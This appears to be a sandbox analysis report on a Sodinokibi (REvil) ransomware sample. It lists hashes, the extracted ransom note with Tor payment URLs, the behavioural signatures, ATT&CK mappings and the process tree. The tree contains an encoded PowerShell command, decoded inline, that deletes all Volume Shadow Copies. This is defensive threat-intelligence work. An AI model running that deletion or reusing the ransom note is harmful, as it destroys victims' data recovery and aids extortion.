Analysis

  • max time kernel
    143s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    07-07-2022 21:44

General

  • Target

    43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe

  • Size

    164KB

  • MD5

    f110035255ecf395f0d5fa1cd89bf15f

  • SHA1

    e60d841b1630f1c6abc0060448ed718a92ec3b56

  • SHA256

    43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4

  • SHA512

    974d4babf66d1cd7d20fe61390b248c2251d403fe15d8e0b2eea29096db4ab83e8488bfbce82dceb725cda11bdd26284656394e8d30fa1cbf592973c8456691a

Score
10/10

Malware Config

Extracted

Path

C:\60jrl815t1.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 60jrl815t1. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/11FE1E49C1C4B6AB c) Open our secondary website: http://decryptor.top/11FE1E49C1C4B6AB When you open our website, put the following data in the input form: Key: r9GalX9ZAeR5pRNlEKtw42ztALmTZWw/M7vvPgWxNKXyJ2pX+vZBoVS/OQZeO1/T o9CsgzDb2memck6PuoMSb8GArAU47/GWp/mMF25kIpmkpZZs2xUTP/y5lNlcUmdF nrsqDAo+vhxI2McfYeIolDeO5Wmd0GzPL9bRVs56rjr0V9HRHnJaxvISCM6WzAH0 tkkAhArEcC10oBudbFwt7PHWxTluJq082USNdg5yF+YH85g9/Pk9iFI/a6mHORPF Hd54LeB+y9zFD51eCW6MUZwv55FsE2DMvhoH4a/9vN1atigafWPkPi9thvhu4dd7 0zBxqtYDkg9PweTv1vuJSt9O5NPAPhdVGmw5Dk/hZFEncZPPwWksKwXirm8XOqOb fYPfGixP0L91RrXlGvXr8FKcDqGuJ368npfRoXM5EENO+VI3LQTldPdTOw526OpZ 9+i8HZMRjhjea3cygkrXKGP4TkY4g3eyaRS2Wz3j8iEdkmOqzVn5XJOii28BK3nM z5sh26pX/V1NtYsyxJB0uf88d2p08a0TAcaoYkcf9pCEaitwsUnWZbN4q/+V6wtR NKd2KglsCG5BVGRwy0Z0T3ptDR/OrUNuKXzr7dUWDjdvzUbopxn2P6n9TfoUWzwv yhyLhFk0/vPm26TA+uGqOwYqrYO39NZCvoL3UseCtFr2dMj2ClG/mhu1BEhtQJfn RwVuGgzYEbvPhk6rT7rfNDwONEUmd+2nbc71Y0AvHmTQ+AqtJ4e7DfcbCpNpD+d/ hvv600R1W+NXRwY+ihwdTUnaN7ym8/9ggfekqu6Stfl3EpI77iyRvWWnnfaIZDoR YRUo47WcxkgAOv44pvU2xWWK8IslY7c7hXfMuSolg8OGxgSuAbqWVE9x+D0YB1Hq rKSNijJf5OYmrNXgzm2hE6shGqNK4nwAjOEqNarJZWQA1gez7KqMb0Er9Tq+v9oK TNK1SETs0v4gw0W2bMDLjIdIWwaqLng+pFVSmxVt+KX3wXtjJ8kbmgx2ipgomxwd 6L8PqZe1EO+Koia2mRqZ/KlW3srgkzQsdM2QJ9zM26OzWC/WcA2eplNw7x3JvXNv 5k+mbmcGdKgCCCce1rPGL69SUQJrS4xh572Dsk2bE7K71T2PVCUOYKto09ksmp1g ccOYL40sLaGifjd/dgE= Extension name: 60jrl815t1 ----------------------------------------------------------------------------------------- !!! DANGER !!! 
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/11FE1E49C1C4B6AB

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe
    "C:\Users\Admin\AppData\Local\Temp\43cd585e36a8b4edf2b6ef406ae5f019b1480401c684bd2bf594195f075433e4.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which deletes every Volume Shadow Copy via WMI, removing the local restore points)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4696
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:3512
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1892

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    Modify Registry: 1 (T1112)
  • Discovery
    Query Registry: 1 (T1012)
    Peripheral Device Discovery: 1 (T1120)
    System Information Discovery: 1 (T1082)
  • Impact
    Defacement: 1 (T1491)


Downloads

  • memory/4696-130-0x0000000000000000-mapping.dmp
  • memory/4696-131-0x00000256385D0000-0x00000256385F2000-memory.dmp
    Filesize: 136KB
  • memory/4696-132-0x00007FFB09AA0000-0x00007FFB0A561000-memory.dmp
    Filesize: 10.8MB
  • memory/4696-133-0x00007FFB09AA0000-0x00007FFB0A561000-memory.dmp
    Filesize: 10.8MB